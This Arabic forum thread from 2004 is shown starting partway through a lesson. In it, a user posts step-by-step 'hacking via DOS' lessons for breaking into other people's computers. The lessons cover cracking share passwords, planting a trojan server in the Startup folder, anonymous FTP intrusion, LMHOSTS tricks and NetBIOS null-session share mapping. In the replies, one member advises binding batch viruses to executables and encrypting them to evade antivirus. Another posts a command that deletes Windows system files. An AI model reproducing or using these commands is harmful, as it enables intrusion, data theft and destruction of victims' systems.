وتقوم بكتابة هذا الامر بالرن مع العلم بان تقوم بكتابة الايبي الخاص بالضحيه بدل 127.0.0.1

وبعد ذالك ستجد نفسك بجهاز الضحيه

فاذا كان الضحيه واضع باسورد سيكون هنا دور عمل برنامج pqwak

شرح البرنامج

بعد فتح البرنامج تعمل التالي

في مكان ip تقوم بكتابة الايبي الخاص بالضحيه

share:تكتب هنا مشاركات الضحيه

name: تكتب اسم جهاز الضحيه

وبعد ذالك قم بالضغط على crack

وستحصل على الباسورد

وللعلم

في الامر رقم واحد تستطيع الحصول على اسم جهاز الضحيه

وفي الامر رقم اثنين تستطيع معرفة المشاركات وتكون موجود بمكان harename

الان بعد دخول الجهاز قم بزرع السيرفر بجهاز الضحيه وتكون الطريقه بالاتي


السي ----الويندوز -------الستارت مينو ---- البروجرام ------ الستارت اب

وبعد اعادة تشغيل الجهاز سيعمل الخادم



------------------------------------------------------------------------------------------------------------------------------------

ملاحظه : سيتم الشرح لهذا الموضوع وسيتم تقديم بعض وصلات المواضيع المهمه التي تستطيع ان تعرف عن طريقها المزيد عن هذا الموضوع ويكون ذالك في نهاية الموضوع اي الدرس بالكامل

------------------------------------------------------------------------------------------------------------------------------------

نهاية درس رقم اثنين لتعليم الاختراق الاجهزه عن طريق الدوس .....

-------------------------------------------------------------------------------------------------------------------




الدرس الثالث



ارسل رسالة للضحيه عن طريق الدوس

ويتم ذالك بالطريقه الاتيه

بعد الحصول على الايبي الخاص بالضحيه تقوم بكتابة هذا الامر بشاشة الدوس

nbtstat -A 127.0.0.1

ولا تنسي ان تكتب الايبي الضحيه بدل 127.0.0.1

بعد كتابه الامر ستظهر لك احد هتان الرسالاتان

host not found اذا ظهرت هذه الرساله فتعني ان ليس بستطاعتك ارسال رساله للضحيه

اما اذا ظهرت هذه الرساله

MAC ADDRESS

فتعني ان هناك امكانيه ارسال الرساله للضحيه

ويتم ارساله الرساله بالشكل التالي

NET SEND 127.0.0.1 Fuck u

وتكتب بدل 127.0.0.1 الايبي الخاص بالضحيه

وتكتب بدل Fuck u الرساله التي تريد ان ترسلها للضحيه

نهاية الدرس

نهاية درس رقم ثلاث لاختراق الاجهزه عن طريق الدوس

--------------------------------------------------------------------------------------------------------------------------------



---------------------------------------------------------------------------------------------------------------

ملاحظه : اني احاول ان اجمع جميع الطرق للاختراق بالدوس فمن يعرف طريقه غير مذكوره فاليراسلني على الايميل Q8_KOL_____________

من اجل وضع الطريقه التي يعرفها في الموقع من اجل زيادة الفائده للجميع

--------------------------------------------------------------------------------------------------------------------------



الدرس الرابع


الإختراق عن طريق الدوس بال FTP

هذا الدرس من اشهر الدروس التي وجتها والتي تعلم الاختراق عن طريق الدوس وهو مشهوره بجميع المنتديات العربيه ويستخدم بهذه الطريقه شاشة الدوس لذلك احببت ان اضعه لكم


الإختراق عن طريق الدوس

السلام عليكم و رحمةالله و بركاته
اليوم سوف نتناول طريقة إقتحام عبر FTP
FTP
أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البور
21
مفتوح و هو البور الخاص ب
FTP
و لتأكد من أن البور مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من اهمها
Superscanne
بعدما تتأكد ان البور مفتوح ننتقل الى الخطوة الثانية و هي
إضغط على
Start
ثم
Run
ثم اكتب
ftp –n
سوف تطلع لك نافدة في الدوس مكتوب عليها
FTP>
ؤوكي لحد هنا كل شيء تمام
و بعدين اكتب
Open
ثم إضغط على
إدخال
Enter
سوف تتحصل عب النتيجة التالية
FTP>
To
أكتب بجانب
To
رقم الإبي للضحية ثم إضغط على إدخال
و الآن خد بالك معي

إدا تحصلت على هدا الرد فقد تخطيت خطوة
Connected http://www.assassin.com/
220 websrv1 Microsoft FTP Service (Version 4.0).
و الآن أكتب الكتابة التالية
ftp>quote user ftp
إدا تحصلت على هدا الرد فقد تخطيت خطوة
331 Anonymous acces allowed, send identify (e-mail name) as password.
و الآن أكتب الكتابة التالية
ftp>quote cwd ~root
إدا تحصلت على هدا الرد فقد تخطيت خطوة
530 Please login with USER and PASS
ثم أكتب الكتابة التالية
ftp>quote pass ftp
إدا تحصلت على هدا الرد فقد تخطيت خطوة
و نجحت في الإقتحام

230 Anonymous user logged in.
مبروك أنت الآن في جهاز الضحية
ما عليك الآن الا ان تقوم بإستعمال
اوامر الفتيبي
و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر FTP و إدا اردتم ان تضحكو بقاليأكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء و لهدا
قمت بحضير الىوامر لكي تطبقوها مباشرةا بعد نجاح الإقتحام

Pwd
لكي تعرف ما يحتويه الهارد ديسك
Cd
لإقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
___
لكي تحمل الى سطح المكتب بتاع جهازك
مثال
___ black.exe
Put
العملية الع____ية ل
___
يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Clos
لقطع الإتصال مع الضحية


هدي أهم الأوامر و الآن سون تطرق على أنواع الرسائل الي نتحصل عليها من جهاز الضحية أثناء تطبيق الأوام و شرحها و ارقامها
Codes: Signification:
110 Restart marker reply.
120 Service ready in nnn minutes. (nnn est un temps)
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message.
215 NAME system type.
220 Service ready for new user.
221 Service closing control connection.
225 Data connection open; no transfer in progress.
226 Closing data connection.
227 Entering passive mode (h1, h2, h3, h4, p1, p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pendingfurther information.
421 Service not available, closing control connection.
425 Can't open data connection.
426 Connection closed; transfer aborded.
450 Requested file action not taken. (Fichier déjà utilisé par autre chose)
451 Requested action aborded: local error processing.
452 Requested action not taken. (Pas assez de mémoire pour exécuter l'action)
500 Syntax error, command unrec

نهاية الدرس



--------------------------------------------------------------------------------------------------

للامانه : تم اخذ هذا الموضوع من احد المنتديات العربيه وتم وضعه من اجل الفائده

---------------------------------------------------------------------------------------------------



تم انتهاء درس الاحتراق عن طريق الاف تي بي باستخدام شاشة الدوس السوداء

-----------------------------------------------------------------------------------------------------------------



الدرس الخامس

اختراق الاجهزة بدون برامج


السلام عليكم شباب
اعرف ان هذه الطريقة صعبة ولكنها فعالة بس تحتاج الي جهد مضاعف وستنجحون.
تحتاج الي :
1- معرفة ب Netstat وتقدر تدخل عليها من windows وبعدين programs وبعدين Ms dos او بكتابة ___ في امر رن ولما يطلع موجه الدوس اكتب الاتي :
netstat

رايح تطلع لك قائمة طويلة تضم الاتصاللات المباشرة بينك وبين السيرفرات المتصل بها مثلا هذا عرض لما سيكون عليه الشكل:
|Proto| |Local Address| |Foreign Address| |State|
________|____ _______|_________ _________|_________ _______|__
|Protocol used|| Your computer ||The Remote Computer||Connection|
|(TCP or UDP) || address. In the || address. In the ||State of |
|_____________|| format: IP:Port ||format: IP: Port or||the port. |
|or compname:Port || compname:Port. ||__________|
|Ex: klemd:5190 or||Ex:http://www.yahoo.com/|
|22.34.12.132:138 ||or 23.132.12.46:80 |
|_________________||___________________|

طبعا رايح تسوي اتصال مباشر بينك بين اللي تبي تخترق جهازه علشان تجيب الاي بي تبعهIP ولان هذا يتم بعدة طرق لا مجال لشرحها هنا ولكني ساوضحها في موضوع اخر باذن الله . المهم الاتصال المباشر يمكن يتم اذا صار انتقال لملف منك اليه او العكس او جري بينك وبينه حديث بالصوت عبر المسنجر الياهو او الهوت ميل او اي مسنجر اخر مثل AIM او ICQ ..
بعد ما تحصل الاي بي تبع الضحية عليك بالتالي تروح لموجه الدوس MsDos وتكتب
حق الضحيةC:\NBTSTAT -a ( IP
من دون الاقواس
سوف تتحصل علي شئ من اثنين :
1- host not found
وهذ يعني ان النظام غير قابل للاختراق ( بهذه الطريقة.. شعرانا انه لا جدار امني في العالم الا وفيه ثغرة)
او 2- تلقا الاتي يطلع لك

NetBIOS Local Name Table

Name Type Status
----------------------------------------------
GMVPS01 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
GMVPS01 <03> UNIQUE Registered
GMVPS01 <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered

هناك الكثير من المعلومات يمكن استنتاجها من هذه الكلمات مثلا تلقا الهوست نيم والرقم 20 في GMVPS01 يعني ان الملفات الموجودة عندها فيها مشاركة طبعا رايح تقدر تدخل عليها ..
الان كيف ندخل علي الكمبيوتر بعد ان تاكدنا انه سهل الاختراق.
تحتاج الي تغيير في ملف في الوندوز اسمه LMHOST.sam ابحث عنه في البحث وسوف تجده افتحه بواسطة محرر نصوص عادي Notebad سوف تجد فيه التالي:
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extension
#
# #PRE
# #DOM:
# #INCLUDE
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:" tag will associate the
# entry with the domain specified by . This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE " will force the RFC NetBIOS (NBT)
# software to seek the specified and parse it as if it were
# local. is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a ______.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# ______ prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addtion the share "public" in the example below must be in the
# LanMan______ list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
# \machine\system\currentcontrolset\services\lanmans

erver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped to___her. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.

طبعا تحتاج لدراسة الملف دراسة عميقة ثم تضيف فيه عن السطر التالي
#PRE #DOM:127.0.0.1 #INCLUDE
طبعا تكتب الايبي الخاص بالضحيه بدل 127.0.0.1
نروح علي Networknighborhood ونعمل رايت كليك right click نختار سيرج يحث او بحث عن كمبيوتر Search for computer
ادخل في المكان المخصص الاي بي ادريس تبع جهاز الضحية واضغط انتر Enter وانتظر للحظة
سوف تقوم الان بتصفح جهاز الضحية وكانه جهازك وسوف تاخد ما تريد لكن فقط للملفات اللي تدعم Share . طيب اذا لم يكن هناك Shared Floders يعني لا وجود للرقم 20 ..اذن انت تحتاج الي معرفة بشئ جديد اسمه DoS Attack .
اتمني التوفيق للجميع ومع السلامةاختراق الاجهزة بدون برامج


------------------------------------------------------------------------------------------------------

للامانه : تم اخذ هذا الموضوع من احد المنتديات العربيه وتم وضعه من اجل الفائده

------------------------------------------------------------------------------------------------------



تم انتهاء درس اختراق الاجهزه من دون برنامج ارجو التوفيق للجميع



---------------------------------------------------------------------------------------------------

الان ساقدم درس انجليزي يعطيك معلومات عن النيوك واهميته وكيفية الحمايه منه



الدرس السادس

Winuke

written by Atl@ntis

Winuke is the first and one of the most popular DoS attacks.Winuke requires only\y the IP of the victim and causes Windows 95/NT of your victim to hang,the phone line with the ISP stays open but the TCP/IP doesn't send or receive anything.

Winuke sends some characters to the NETBIOS port of Windows by using Out Of Band packets.This port is useless for most users.Windows support Out Of Band packets but doesn't know what to do them and in the screen of he user appears the blue screen with the error message and makes the user to reboot.

Microsoft has given some patches for this bug but they don't always work.The best solution for most of users is to close the 139 port manually,since it's useless for them.How can you close the 139 port?Just go to C:\Windows\System find the file named vnbt.386 and rename it to vnbt.closed and reboot your system.





يوضح كاتب الموضوع بان ضرب الاجهزه بالنيوك هو من اشهر انواع الهجوم على الاجهزه

وعملية الضرب هذه تقدر ان تعلق الجهاز

عملية الضرب بالنيوك هي هملية ارسال إلى النت بويس ويكون ذالك باستخدام حزم خروج تضرب المستخدم

وعندما يتم ضرب جهاز فان المستخدم لان يعرف السبب ولاكنه سيظر إلى اعادة تشغيل الجهاز

والحل الوحيد لهذه المشكله هي باغلاق بورت النت بويس والذي هو 139

ويكون ذالك بتغير اسم الملف vnbt.386 إلى اسم vnbt.closed

وبعد ذالك اعد تشغيل الجهاز وسيكون المنفذ مغلق



نهاية الدرس رقم سته

----------------------------------------------------------------------------------------------------------

الدرس السابع

NETBIOS


This guide will tell you the basics of how a hacker might go about breaking into your file shares,
and how to secure it. It is by no means a step-by-step guide, but it should give you the general idea. I hope you learn from it.

There are some basic things that you will need before you can start breaking into systems,
or testing your own for security. All tools needed are available on the Internet.

PORT SCANNER: Before you can test any systems security, no matter the operating system, you will need a port scanner. A port scanner tests a system for running services, such as FTP, Telnet, WWW, etc. When hacking NetBIOS, obviously you are looking for the NetBIOS port, 139 TCP. This can show up as many things in different port scanners, but it is usually netbios-ssn or nbsession. Some good Windows scanners are Blue's Port Scanner and SuperScan.

NET PROGRAM: This is usually installed on your system by default, but sometimes you will need to install it from the Windows CDs. Net is a DOS command line tool that you will use to do most of your hacking when hacking NetBIOS. To test if you have it install, open an MS-DOS prompt and type net at the command line. Hit enter. If you ___ something like the following then it is installed:


The syntax of this command is: NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION | SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW }
Otherwise, if you ___ Bad command or file name then isn't installed, and you will need to do this manually.

On Windows NT ( also XP & 2000 ) there is 2 types of shares. User level and share level. If you have Windows 9x on your system, you will be able to connect to share level shares, but not user level. Share level shares are basically accessible with full privileges to anyone, sometimes with a username and password. User level depends on the user you log in as. Depending on the user level, you will ___ more or less access to the share... I think you ___ the general idea.

Once you have picked your tar___, you will need to port scan it. As I mentioned earlier, port scanning is looking for running services. You are looking for NetBIOS Session Service, running on port 139 TCP ( so don't use a UDP port scanner ). Simply put the IP address of the host you are scanning in, and start. If port 139 shows up then you could be in luck. This doesn't always work, but try using the following command:


C:\>nbtstat -A ip_address
If you ___ some error, or host not found, then don't worry, but sometimes it will work, and show you something like the following:


Net BIOS Remote Machine Name Table Name Tupe Status

-------------------------------------------------

srv3 <00> Unique Registered r7labs <00> Group Registered srv3 <20> Unique Registered srv3 <03> Unique Registered ghost <03> Unique Registered
What you are looking for is a <20>. As you can see, the above table has a <20> beside srv3, telling you that this systems has file sharing enabled.

We now want to see what shares are available on the system ( whether the table showed up or not - that just gives you an idea ):


C:\>net view \\ip_address
If you ___ someting like System error 5 has occured - Access is denied then don't worry. We can just use the default NT IPC share to become a part ot the everyone workgroup, which will make the ______ think that you are in the same domain as it. Heh, watch this:


C:\>net use \\ip_address\ipc$ "" /u: "" The command completed successfully
What the above command does is connect to the IPC share with a username of NULL ( \u: "" ) and a password of NULL ( "" ). Now try the net view command again:


C:\>net view \\ip_address Share resources at ip_address: Share Type Comment

-----------------------------------------------------------

accounts Disk ShareDocs Disk Lpt1 Print Printer 1


As you can see, there are 2 file shares, accounts and ShareDocs. Now its time to use the use part of the Net program. Let's say that you wanted to see the SharedDocs share, you would do the following:


C:\>net use x: \\ip_address\SharedDocs
Where x: is a drive that isn't in your computer. You don't need a physical hard drive, just a free letter to map to, so don't use a letter that you already use. A good thing to know is that if you use an asterik ( * ), your computer will map it to a free drive, so the following command would work:


C:\>net use * \\ip_address\share_name
Many people also don't know how to map shares with spaces in the name. Lets look at an example. Pretend that you want the share My Docs from 127.0.0.1, you could use the following command:


C:\>net use * "\\127.0.0.1\My Docs"
NOTE: If you don't put the quotes you will ___ an error like The network path was not found.

If you ___ The command completed successfully when you try to map a share, then open My Computer, and double click on the new drive that shows up there. You will then be able to explore the share like you were exploring your own computer. However, if you ___ The password is invalid for \\ip_address\share_name and Enter the user name for "ip_address" then it is password protected, either user level or share level.

Note that yoy don't have to just explore the system you are connected to! You can view the other work groups by using the following command:


C:\>net view /domain
You should ___ a list of work groups. If you fancy exploring a work group to view other systems in the domain, try:


C:\>net view /domain:workgroup_name
Then you will be able to see the systems in that workgroup, try connecting to them and exploring the shares.

NOTE; If no shares show up on a system when you do net view \\ip_address, but you are sure that they have file shareing enabled ( if they have port 139 open ), you could give the following command:


C:\>net share c=c:
Which would hsare the c drive ( c: ) with the name c. Of course, this would require either local access to the machine, or a command prompt to the machine.

Possibly the best and most secure method would be to turn file and print sharing off on any machines that do not require it. However, if yhour systems does require it, for LAN, etc, you could try using user level shares with a hard-to-crack password, consisting of special characters, numbers, and uppercase and lowercase letters.

You could also uncheck the Allow network users to change my files option on important file shares. If you still need to be able to modify shares over the network however, possibly the best option would be to install a firewall on the system, and set it to only allow traffic onthe local network, and not the Internet at all.

Hope you found this file informative... DATA_Noise
Underground Systems
Staff

---

نهاية الدرس




----------------------------------------------------------------------------------------------------

تذكير : هذا الدرس يشرح النت بويس ويشرح اهمية النت بيوس فيجب قرائة هذا الدرس باهميه ولذي لا يعرف

انجليزي فليقم بتجرمة هذا الدرس باحد المواقع التي

تعطي امكانية الترجمه

----------------------------------------------------------------------------------------------------



وقبل ان انهي هذه الدروس اقدم لكم كتاب انجليزي يشرح ويعلم النت بويس

hhttp://www.geocities.com/mr_honfer/In_depth_Guide_Too_Hacking_Windows_Using_NetBIOS.z ip

نهاية الدروس



ارجو ان تكونو استفتو من هذه الدروس

مع تحياتي

Hshoom AL7$UNEe

Q8_KOL_____________

  #4  
قديم 24-01-2004, 08:14 AM
MR-HONFER MR-HONFER غير متواجد حالياً
ضيف
 
تاريخ التسجيل: 16-09-2003
الدولة: alKuWit
المشاركات: 31
معدل تقييم المستوى: 0
MR-HONFER في الطريق الصحيح الى الشهرة

4-عرفة بعض الاوامر المهم عن طريق الدوس


رابعاً : اهم اوامر الدوس

اهم اوامر الدوس

DIR عرض محتويات الإسطوانة الصلبة او المرنة
DIR/P عرض المحتويات صفحه صفحه
DIR/W عرض المحتويات بصورة مستعرضة
DIR/O عرض الفهارس اولاً ثم الملفات مع الترتيب
DIR/AD عرض الفهارس فقط
DIR/B عرض محتوى الاسطوانه الصلبه او المرنه بدون الحجم والتاريخ والوقت
DIR/L عرض محتوى الاسطوانه الصلبه بالحروف الصغيره
DIR/S عرض جميع الملفات والبحث عن ملف معين
DIR->PRN طباعة محتوى الاسطوانه على الورقة
DIR->ASH عرض الفهارس والملفات المخفيه
DIR-*.SYS عرض الملفات التي لها امتداد SYS
CLS يستخدم من اجل تنظيف شاشة الدوس
COPY هو امر من اجل عملية النسخ وعن طريق هذا الامر تستطيع تغير مسار السيرفر COPY ______.EXE ______.BAT
UNDELETE امر استرجاع الملفات التي تم حذفها
MD يستخدم هذا الامر لانشاء مجلد جديد جرب هذا الامر بنفسك
REN يستخدم لتغير اسم الملف او المجلد

هذه بعض الاوامر

نهاية الدرس

ارجو ان تكونو قد استفتو من الدرس

مع تحياتي

Hashom AL7$UNEe

Q8_KOL_____________

  #5  
قديم 24-01-2004, 08:48 AM
MR-HONFER MR-HONFER غير متواجد حالياً
ضيف
 
تاريخ التسجيل: 16-09-2003
الدولة: alKuWit
المشاركات: 31
معدل تقييم المستوى: 0
MR-HONFER في الطريق الصحيح الى الشهرة

5- عرفة كيفية استخراج الايبي






يتكون الموضوع من
أ--ب
أ: كيفية استخراج الايبي الخاص بالضحيه عن طريق الدوس

قبل كتابة الدرس


==============================================
ملاحظه :
في درس رقم 7
7- استطعت ان اصمم ملفات تستطيع ان تنفذ لي بعض الاوامر المتعبه بسهوله تامه
سيتم تعليم طرق تصميم ملفات صغيره تساعدنا بمعرفة الايبي الخاص بالضحيه ومعرفة المنافذ المفتوحه في الجهاز الخاص بنا


==============================================

الطريقه المستخدمه والمعروفه

اذا كان الضحيه معك على محادثة المسنجر او على اي محادثه اخري قم وارسل

اي ملف او ارسل الخادم الذي هو بمعني اخر السيرفر

ثم

قائمة ابدا

ثم تشغيل

اكتب ___

ثم اكتب netstat -n

بين حرف n و- الشرطه مسافه

سيظهر رقم الآيـبي للضحيه في أسفل الجهه اليمنى

للتوضيح :

Local Address هذا رقم الاي بي الخاص بيك انت

Foreign Address هنا تحصل رقم الاي بي حق الضحية اخر رقم فيهم

ٍState بتلاقي مكتوب قدام رقم الاي بي حق الضحيه اللي هو اخر واحد في Foreign Address تلاقي مكتوب TIME_WAIT

هذه الطريقه بالنسبه للاجهزه
--------------------------------------------------------
ب : استخراج الايبي الخاص بالموقع

الطريقه سهله جداً فكل ما عليك عمله هو دخول شاشة الدوس ومن ثم كتابة هذا الامر

PING SITE NAME.COM

ومن ثم سيظهر لك الايبي الخاص بالموقع




ارجو ان تكونو استفتو من هذه الدروس

مع تحياتي

Hshoom AL7$UNEe

Q8_KOL_____________

  #6  
قديم 24-01-2004, 08:52 AM
MR-HONFER MR-HONFER غير متواجد حالياً
ضيف
 
تاريخ التسجيل: 16-09-2003
الدولة: alKuWit
المشاركات: 31
معدل تقييم المستوى: 0
MR-HONFER في الطريق الصحيح الى الشهرة

6- استطعت ان اصمم ملفات تستطيع ان تنفذ لي بعض الاوامر المتعبه بسهوله تامه




6- تصميم ملفات تنفذ اوامر الدوس






طرق تصميم ملفات تصمم الاوامر بهوله تامه

هذه الطريه اهي بالاساس وضع اوامر الدوس في نوته باد ومن ثم تغير المسار إلى
bat
وفتحه وستنفذ الاوامر
بمعني اخر مثل عملية تصميم الفايروسات

وساشرح لكم هذه الاعمليه


امر netstat -n

يعطيك حالة الايبيات المتصله بجهازك ومن خلال هذا الامر تستطيع معرفة الايبي الضحيه من خلال ارساله له ملف
ومن ثم كتابة هذا الامر بالدوس
فلو فكرنه بالعمليه ستكون بالتالي
ارسل ملف ثم افتح شاشة الدوس ثم اكتب الامر وابحث عن الايبي

الان ساعطيكم طريقه سهله بالاول قم بفتح نوته بادر ومن ثم اكتب

----------
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cls
@pause
netstat -n
@pause
cls
exit:
-------------


ضع هذه الاوامر بمفكره نوته باد ومن ثم قم بتغير مسار النوته باد إلى
المسار bat
ومن ثم قم بتشغيل الملف الذي تكون لك وسيظهر لك جهات الاتصال ومن خلال جهات الاتصال ساعرف من متصل بك
ويكون بذلك الشكل


Local Address هذا رقم الاي بي الخاص بيك انت

Foreign Address هنا تحصل رقم الاي بي حق الضحية اخر رقم فيهم

ٍState بتلاقي مكتوب قدام رقم الاي بي حق الضحيه اللي هو اخر واحد في Foreign Address تلاقي مكتوب TIME_WAIT



وهذا مثال لصنع ملف يبين حالات الاتصال بجهازك ويساعدك على استخراج ايبي الضحيه

http://www.geocities.com/mr_honfer/Ip_____By_DosMan.zip



نهاية الدرس

مع تحياتي

Hashom AL7$UNEe

Q8_KOL_____________

  #7  
قديم 24-01-2004, 09:05 AM
MR-HONFER MR-HONFER غير متواجد حالياً
ضيف
 
تاريخ التسجيل: 16-09-2003
الدولة: alKuWit
المشاركات: 31
معدل تقييم المستوى: 0
MR-HONFER في الطريق الصحيح الى الشهرة

قبل ما انهي الموضوع حبيت اني اقدم لكم فايروسات مصمم بالدوس

  #8  
قديم 24-01-2004, 08:28 PM
abu hady abu hady غير متواجد حالياً
ضيف
 
تاريخ التسجيل: 25-05-2003
الدولة: فلسطين
المشاركات: 37
معدل تقييم المستوى: 0
abu hady في الطريق الصحيح الى الشهرة

مشكور على هذا المجهود الرائع والى الامام
وأيضا على هذه الكتب :f

  #9  
قديم 26-01-2004, 09:52 AM
MR-HONFER MR-HONFER غير متواجد حالياً
ضيف
 
تاريخ التسجيل: 16-09-2003
الدولة: alKuWit
المشاركات: 31
معدل تقييم المستوى: 0
MR-HONFER في الطريق الصحيح الى الشهرة

العغو ومشكور على مروورك الموضوع

  #10  
قديم 27-01-2004, 02:34 AM
egyptianhacker egyptianhacker غير متواجد حالياً
نجم جديد
 
تاريخ التسجيل: 14-12-2003
المشاركات: 56
معدل تقييم المستوى: 11
egyptianhacker في الطريق الصحيح الى الشهرة

السلام عليكم
أخى أولاً ملفات *.bat ملفات ذات شكل غير مألوف بالنسب للمستخدمين وسيكون هناك خوف من فتحها ثانياً هل جربت فحص الفيرس أى أنتى فيرس حتى النورتون يستطيع كشف هذة الملفات بسهولة بمجرد وجود أمر مثل deltree على سبيل المثال

لكنك مشكور لعرض أمثلة متنوعة لأوامر الدوس ورجاء لفت انتباه أى مستخدم يريد استخدام هذا النوع من الفيروسات أولاً يجب دمج الملف virus.bat على سبيل المثال مع أى ملف تنفيذى ثم تشفير الملف حتى لا تتمكن مضادات الفيرس من إكتشافه وشكراً لمجهودك أخى

  #11  
قديم 27-01-2004, 07:03 AM
محمـــــــد محمـــــــد غير متواجد حالياً
نجم جديد
 
تاريخ التسجيل: 24-02-2003
الدولة: السعودية
المشاركات: 166
معدل تقييم المستوى: 13
محمـــــــد في الطريق الصحيح الى الشهرة

أروع درس قرأته في حياتي من ناحية التوضيح والشرح الكامل
والكمال للـــــه ..
الله يعطيك الف الف عافيه اخوي MR-HONFER...... ومشكوور على هالدرس الرائع

  #12  
قديم 27-01-2004, 09:06 PM
rashaas2010 rashaas2010 غير متواجد حالياً
نجم جديد
 
تاريخ التسجيل: 07-01-2004
المشاركات: 99
معدل تقييم المستوى: 11
rashaas2010 في الطريق الصحيح الى الشهرة
Smile شكر خاص

اشكر الاخ مشكور على هذا الموضوع وعلى تعبه في كتابته ونطمح منه المزيد منه و من الموجودين لاننا محتاجين اهذه الامور و شكرا



مثنى من العراق

  #13  
قديم 29-01-2004, 11:14 PM
هاكر داون لود هاكر داون لود غير متواجد حالياً
ضيف
 
تاريخ التسجيل: 03-01-2004
المشاركات: 33
معدل تقييم المستوى: 0
هاكر داون لود في الطريق الصحيح الى الشهرة
شكرا باشا

اولا اخى اقول لك

شكرا باشا باشا باشا باشا

وهذا ردى على سؤالك ولله على حسب فهمى من الموضوع واللى انا حابه

del C:\windows\system32\ *.ini *.exe *.scr *.txt *.log *.nls *.drf *.reg *.sys *.dll

لانوا هذا راح يدمر كل الملفات اللى فى الوندوز المهمه وماراح يشتغل

_______________

وثانى شى هل يمكننى صنع فايروس يقوم بمسح كل امتدادات الصور ولا لا

وكل هذى الاوامر اللى اعطيطنا اياهاء ماذا لو كتبناة فى النوت باد بدلا عن الدوس وحولناها الى bat

وكل تحياتى الاعضاء

  #14  
قديم 30-01-2004, 07:18 PM
jaafar19 jaafar19 غير متواجد حالياً
نجم جديد
 
تاريخ التسجيل: 16-05-2003
الدولة: أرض الله الواسعى
المشاركات: 72
معدل تقييم المستوى: 12
jaafar19 في الطريق الصحيح الى الشهرة

مشكوووور على هذا الموضوع القوي..

موضوع مغلق

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع


الساعة الآن 11:35 AM.


Powered by vBulletin® Version 3.8.2, Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
 كل ما يطرح بالمنتدى من مواضيع ومشاركات لا تعبر بالضرورة عن رأي الإدارة ولا تعبر إلا عن رأي أصحابها